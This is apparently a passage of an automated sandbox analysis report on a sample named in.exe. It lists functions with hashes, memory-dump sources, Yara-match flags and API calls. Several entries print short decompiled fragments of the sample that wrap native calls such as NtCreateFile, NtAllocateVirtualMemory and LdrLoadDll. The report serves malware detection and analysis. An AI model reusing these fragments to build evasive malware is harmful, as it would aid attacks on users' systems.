API String ID: 4139908857-0
Opcode ID: 8ebe75e8dbfbefd2eab31af35c0bde337c0ade2418d400bdc2dc2d026c156586
Instruction ID: 825bdf06c8080bd282a6165170a56bc2c41d92db3e7836a67f0c7d0001be99d3
Opcode Fuzzy Hash: 8ebe75e8dbfbefd2eab31af35c0bde337c0ade2418d400bdc2dc2d026c156586
Instruction Fuzzy Hash: E8110FB6D002498FCB10CF9AD444BDEFBF5EB88228F14851AD829A7200C374A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0233DEB9, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0233DF1D

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 42cd0f4e1d0a0da18c933df7e370b0410e472375569596a70b4c9979eaf29dea
Instruction ID: d03d5e30119e5080705f99d0e9065747c17142107c36b5d29d0b8140c17c6e01
Opcode Fuzzy Hash: 42cd0f4e1d0a0da18c933df7e370b0410e472375569596a70b4c9979eaf29dea
Instruction Fuzzy Hash: 911115B59003489FDB10CF99D584BDEBBF8EB88324F14841AE955B7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0233DEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0233DF1D

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: db289259d835b870dbeeffd37c99eb9aac0ca0a08cd0984960c23e1dbb98fba2
Instruction ID: 558f3785dfee3866576331a07cfd54a80be27f1b026486d04ff6c47bc252b05d
Opcode Fuzzy Hash: db289259d835b870dbeeffd37c99eb9aac0ca0a08cd0984960c23e1dbb98fba2
Instruction Fuzzy Hash: 4811E2B59003499FDB10CF9AD584BDEBBF8EB48324F14851AE955B7700C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 007ED4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240805760.00000000007ED000.00000040.00000001.sdmp, Offset: 007ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c8138f0864915a54c81ef716f6bd30d4ba9779b15fde2876bc5e374fc453040
Instruction ID: e7ade44e448221f92c903be70dff996a68ac246a6573501594377bd4ca96d08b
Opcode Fuzzy Hash: 3c8138f0864915a54c81ef716f6bd30d4ba9779b15fde2876bc5e374fc453040
Instruction Fuzzy Hash: C22137B1504284DFDB20CF54D9C0B2ABF65FB9C328F248669E9054B246C33ADC66DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007FD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240817112.00000000007FD000.00000040.00000001.sdmp, Offset: 007FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 038d7a0b9cbb41fbafa59df0119ea54559e944de101d0f63e341e5875821521d
Instruction ID: b070f5ebbc5f67bb62fb3e0e7c83d47d275a6547f58af5a18ac7bf0ef2fe2cc4
Opcode Fuzzy Hash: 038d7a0b9cbb41fbafa59df0119ea54559e944de101d0f63e341e5875821521d
Instruction Fuzzy Hash: ED2137B1604248DFDB24DF14D4C0B2ABB62FB88314F24C669EA094B346CB3ADC07DB61

Uniqueness

Uniqueness Score: -1.00%

Function 007ED4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240805760.00000000007ED000.00000040.00000001.sdmp, Offset: 007ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction ID: fb6e25b961877c43ad288246cbf7c3f8cba14259420e72434873fae6d4477249
Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction Fuzzy Hash: 2C110876904280CFCF11CF14D9C4B16BF71FB98324F24C6A9D8050B656C33AD86ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007FD017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240817112.00000000007FD000.00000040.00000001.sdmp, Offset: 007FD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d35afff73f64a3ce4a9ad24b32e567c7a1d94a238c24113185269c1f0cd325c
Instruction ID: 541171316b5ed89e6ff4bf55e527caa8f5c7ab6d9c8c783043cca79b21cc3001
Opcode Fuzzy Hash: 9d35afff73f64a3ce4a9ad24b32e567c7a1d94a238c24113185269c1f0cd325c
Instruction Fuzzy Hash: 2611D075504284CFCB11CF14D5C4B25FB72FB44314F24C6A9D9094B756C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 007ED749, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240805760.00000000007ED000.00000040.00000001.sdmp, Offset: 007ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35946f53440e72ef144f086590df5a636fce73e4b72df34335cbad24a9fa81b0
Instruction ID: db49f182f5546e8886cd677894e92a0c548138fd28ad37cd3f3552a3d2abb81a
Opcode Fuzzy Hash: 35946f53440e72ef144f086590df5a636fce73e4b72df34335cbad24a9fa81b0
Instruction Fuzzy Hash: 250147710093C49AE7304B13CC80B6ABB98EF49338F18C11AED045B246C33C9C44D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 007ED748, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240805760.00000000007ED000.00000040.00000001.sdmp, Offset: 007ED000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb6c688ec97a461336647e7c4338b0afb29853b892c0c81dfc3bd61dcac24a0
Instruction ID: 952679582a5c845e2b9beee8b0de7db0b07357643df8b9ade01271baefeee523
Opcode Fuzzy Hash: 5cb6c688ec97a461336647e7c4338b0afb29853b892c0c81dfc3bd61dcac24a0
Instruction Fuzzy Hash: 30F0C2714052849AE7208F06DC84B66FFA8EF45734F18C15AED084B286C3789C44CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0233C2B0, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc28bf2a84de330c96ca31724d3f04821ec68e29d836ede48f7df175cb66a038
Instruction ID: 19ed4c49cecc32fb03dacacc7c6b8ef9bd89bbe3aa3511fe8fbb90e61e7f488f
Opcode Fuzzy Hash: fc28bf2a84de330c96ca31724d3f04821ec68e29d836ede48f7df175cb66a038
Instruction Fuzzy Hash: A05268F19807068BD713CF14E8881997BB9FB46328FD14A09D361BBAD1D3B465AACF44

Uniqueness

Uniqueness Score: -1.00%

Function 02339968, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240985047.0000000002330000.00000040.00000001.sdmp, Offset: 02330000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: defd1ce4ad7a7c2b0364d0d10d66645215743e7ea310f2d3b025c6cf14593221
Instruction ID: c23df22d484b8a1c63b79ace75a904a6089130bf18becb255a5826138098f79c
Opcode Fuzzy Hash: defd1ce4ad7a7c2b0364d0d10d66645215743e7ea310f2d3b025c6cf14593221
Instruction Fuzzy Hash: EBA16A36E006198FCF16DFA5C84459EFBB3FF85304B15856AE906BB221EB35AA15CF40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: in.exe PID: 6388 Parent PID: 6236 in.exeCOMMON

Executed Functions

Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418263
0x0041826f
0x00418277
0x00418282
0x0041829d
0x004182a5
0x004182a9

APIs

NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5

Strings

B=A, xrefs: 00418282, 00418290
B=A, xrefs: 0041829D, 004182A4

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: B=A$B=A
API String ID: 2738559852-2767357659
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B10(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AB40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b19
0x00409b2c
0x00409b2f
0x00409b34
0x00409b39
0x00409b43
0x00409b48
0x00409b4b
0x00409b4d
0x00409b55
0x00409b5a
0x00409b5a
0x00409b61
0x00409b69
0x00409b6c
0x00409b6e
0x00409b82
0x00000000
0x00409b84
0x00409b8a
0x00409b3e
0x00409b3e
0x00409b3e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181AC, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E004181AC(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				asm("out 0xfe, al");
				asm("fnsave [esi+0x55]");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181ac
0x004181ae
0x004181b3
0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6dcd11ef1a62554d4dab9e4a58ac38bf5ce37e1f5d2377dcadc7bb0617efbccc
Instruction ID: 0b2075313e5f77457880b7a29cf07ab8d8014fcbfd575f16c215328f25e03cd2
Opcode Fuzzy Hash: 6dcd11ef1a62554d4dab9e4a58ac38bf5ce37e1f5d2377dcadc7bb0617efbccc
Instruction Fuzzy Hash: 5001B2B2245208ABCB48DF88DC85EEB77EDAF8C754F15824CBA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004181bf
0x004181c7
0x004181fd
0x00418201

APIs

NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041838A, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041838A(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t21 = gs;
				asm("adc cl, 0x44");
				asm("arpl [ebp-0x75], dx");
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041838a
0x0041838c
0x0041838f
0x00418393
0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 33b7086deecbcc881dd9e888724729b80c303dd0f50764b34e3245cddd136052
Instruction ID: d9310760c475db985ce83dae59a4bfb9abfb8aa48e2751f853c6f930227ba1d0
Opcode Fuzzy Hash: 33b7086deecbcc881dd9e888724729b80c303dd0f50764b34e3245cddd136052
Instruction Fuzzy Hash: B5F058B2200208BFDB14DF99CC81EEB77A9AF9C350F158219FE0897241C634E810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418390(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DB0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x0041839f
0x004183a7
0x004183c9
0x004183cd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004182DA(void* __eax, void* __esi, intOrPtr _a4, void* _a8) {
				long _t11;
				void* _t14;
				intOrPtr _t18;

				 *((intOrPtr*)(__esi - 0x74aaa5fa)) = _t18;
				_push(_t18);
				_t8 = _a4;
				_t3 = _t8 + 0x10; // 0x300
				_push(__esi);
				_t4 = _t8 + 0xc50; // 0x409733
				E00418DB0(_t14, _a4, _t4,  *_t3, 0, 0x2c);
				_t11 = NtClose(_a8); // executed
				return _t11;
			}

0x004182dc
0x004182e0
0x004182e3
0x004182e6
0x004182e9
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 742ee2928fb1090e9969abb71e5d25ffce5efc56d17a0e6fc3b2065b5bb1b889
Instruction ID: ccd9922b3994642820f5e0385ac0a888af02f35723de6470eb997aaa493e85d8
Opcode Fuzzy Hash: 742ee2928fb1090e9969abb71e5d25ffce5efc56d17a0e6fc3b2065b5bb1b889
Instruction Fuzzy Hash: 9FE08C71200204AFD710DF98CC44FE77BA8EF48310F00455DBA5DDB281C530E50087D4

Uniqueness

Uniqueness Score: -1.00%

Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004182E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409733
				E00418DB0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004182e3
0x004182e6
0x004182ef
0x004182f7
0x00418305
0x00418309

APIs

NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305

Memory Dump Source

Source File: 00000002.00000002.285496471.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4

Uniqueness

Uniqueness Score: -1.00%

Function 01289910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128991A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 99b20a3dcd8229d0b138a49aa25cc3750b80a2d0ed72209e66b53f60d89a72db
Instruction ID: 261edd90a4a777195f54ef4234f69453cb68994b95e4f80f7fde94b1afc55485
Opcode Fuzzy Hash: 99b20a3dcd8229d0b138a49aa25cc3750b80a2d0ed72209e66b53f60d89a72db
Instruction Fuzzy Hash: FD9002B121104802D64071AD45047460005A7D0341F51C011A5054554EC6998DD577B5

Uniqueness

Uniqueness Score: -1.00%

Function 012899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012899AA

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1893a86695b41816ef6511322d7802dad687201347bbdcac5645dc615c55782c
Instruction ID: 4b5f0c995b7ea68632f8657dbe331c7df62a18d9ffdc96131df4dd9da9c696ef
Opcode Fuzzy Hash: 1893a86695b41816ef6511322d7802dad687201347bbdcac5645dc615c55782c
Instruction Fuzzy Hash: C89002A135104842D60061AD4514B060005E7E1341F51C015E1054554DC659CC527276

Uniqueness

Uniqueness Score: -1.00%

Function 01289860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128986A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ed3b6f50f604dd2cb4eb6a3f65745c02189aaf926bc30eb6ee98b6f9c0c756a
Instruction ID: d1d26d22201ad7e5714855f283422ce74ea3a7335975e53633dfd01196702ded
Opcode Fuzzy Hash: 5ed3b6f50f604dd2cb4eb6a3f65745c02189aaf926bc30eb6ee98b6f9c0c756a
Instruction Fuzzy Hash: B790027121104813D61161AD46047070009A7D0281F91C412A0414558DD6968D52B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128984A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 495017bb317a68e8a7f13dbc3957cfeea25f7aecd1103e3b276fbd06b198d4da
Instruction ID: e0a1fd070c05c18c2bd268853e37b7be594cf47e52bab704996cb86b00ad05b8
Opcode Fuzzy Hash: 495017bb317a68e8a7f13dbc3957cfeea25f7aecd1103e3b276fbd06b198d4da
Instruction Fuzzy Hash: D4900261252085525A45B1AD45045074006B7E0281791C012A1404950CC5669C56F771

Uniqueness

Uniqueness Score: -1.00%

Function 012898F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012898FA

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c3c53834ffcce21b56256ae01badb431422ea63bbfca9190ecb6a2507853e27d
Instruction ID: 9df6aaa38acd3258ff4fcdc6e026050e581f4bf2496267432509d8d997d7d0b2
Opcode Fuzzy Hash: c3c53834ffcce21b56256ae01badb431422ea63bbfca9190ecb6a2507853e27d
Instruction Fuzzy Hash: 3D90026161104902D60171AD4504616000AA7D0281F91C022A1014555ECA658D92B271

Uniqueness

Uniqueness Score: -1.00%

Function 01289A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A2A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d48888cbff97348eaa24cc353c79514f9f4579c2e8002af2d4b7c33670f16a37
Instruction ID: 5e5e43f6798dd8cb72697c35e701a31515de4d5cfebefebc4b7e8126092e4efd
Opcode Fuzzy Hash: d48888cbff97348eaa24cc353c79514f9f4579c2e8002af2d4b7c33670f16a37
Instruction Fuzzy Hash: E090026161104442464071BD89449064005BBE1251751C121A0988550DC5998C6577B5

Uniqueness

Uniqueness Score: -1.00%

Function 01289A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A0A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7e83da7a01436419310071130996826245898b0893d403f43f655d2183cd664d
Instruction ID: 576991d0ceaea275e8903a412ab1921f37979f544c1391bd188226a0e38c761b
Opcode Fuzzy Hash: 7e83da7a01436419310071130996826245898b0893d403f43f655d2183cd664d
Instruction Fuzzy Hash: 8490027121144802D60061AD491470B0005A7D0342F51C011A1154555DC6658C5176B1

Uniqueness

Uniqueness Score: -1.00%

Function 01289A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01289A5A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 833193361c244fe3f1e29cbd2836e0c3c9cea57f9b5d1753d288358d36825a33
Instruction ID: 6453066b417289cb97f0aaa5f77f336fffb61de313eca1de9c9d8078e86ea8ed
Opcode Fuzzy Hash: 833193361c244fe3f1e29cbd2836e0c3c9cea57f9b5d1753d288358d36825a33
Instruction Fuzzy Hash: 3C90026122184442D70065BD4D14B070005A7D0343F51C115A0144554CC9558C617671

Uniqueness

Uniqueness Score: -1.00%

Function 01289540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128954A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8b20f02cee1705eecbb7ab31701fe5420bac7a03640a54179e304102ce548d33
Instruction ID: 076f5eb1be0439a962e38ff9f4c029e8e1c0cae7262416410cff852533966a9e
Opcode Fuzzy Hash: 8b20f02cee1705eecbb7ab31701fe5420bac7a03640a54179e304102ce548d33
Instruction Fuzzy Hash: C9900265221044030605A5AD07045070046A7D5391351C021F1005550CD6618C617271

Uniqueness

Uniqueness Score: -1.00%

Function 012895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012895DA

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cbe3432b2bdd0157e1328062a0ed72add559594de10c1bf2f8875daba86e5f40
Instruction ID: 3780100c082ff7efa4daa5cbb73506548c6fcc3829596cc46f3001a656fd950c
Opcode Fuzzy Hash: cbe3432b2bdd0157e1328062a0ed72add559594de10c1bf2f8875daba86e5f40
Instruction Fuzzy Hash: 459002A121204403460571AD4514616400AA7E0241B51C021E1004590DC5658C917275

Uniqueness

Uniqueness Score: -1.00%

Function 01289710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0128971A

Memory Dump Source

Source File: 00000002.00000002.285953904.0000000001220000.00000040.00000001.sdmp, Offset: 01220000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
